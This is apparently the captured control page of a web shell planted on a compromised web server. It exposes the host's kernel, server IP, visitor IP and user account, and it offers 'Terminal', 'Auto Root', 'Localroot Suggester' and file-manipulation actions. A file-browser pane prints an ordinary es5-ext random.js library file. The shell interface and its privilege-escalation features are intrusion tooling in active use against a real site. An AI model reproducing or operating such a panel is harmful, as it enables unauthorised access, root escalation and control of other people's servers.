Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.242.43
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
es5-ext /
string /
Delete
Unzip
Name
Size
Permission
Date
Action
#
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
from-code-point
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
raw
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
format-method.js
708
B
-rw-r--r--
1985-10-26 08:15
index.js
287
B
-rw-r--r--
1985-10-26 08:15
is-string.js
291
B
-rw-r--r--
1985-10-26 08:15
random-uniq.js
213
B
-rw-r--r--
1985-10-26 08:15
random.js
1.05
KB
-rw-r--r--
1985-10-26 08:15
Save
Rename
"use strict"; var isValue = require("../object/is-value") , toNaturalNumber = require("../number/to-pos-integer"); var generated = Object.create(null), random = Math.random, uniqTryLimit = 100; var getChunk = function () { return random() .toString(36) .slice(2); }; var getString = function (/* length */) { var str = getChunk(), length = arguments[0]; if (!isValue(length)) return str; while (str.length < length) str += getChunk(); return str.slice(0, length); }; module.exports = function (/* options */) { var options = Object(arguments[0]), length = options.length, isUnique = options.isUnique; if (isValue(length)) length = toNaturalNumber(length); var str = getString(length); if (isUnique) { var count = 0; while (generated[str]) { if (++count === uniqTryLimit) { throw new Error( "Cannot generate random string.\n" + "String.random is not designed to effectively generate many short and " + "unique random strings" ); } str = getString(length); } generated[str] = true; } return str; };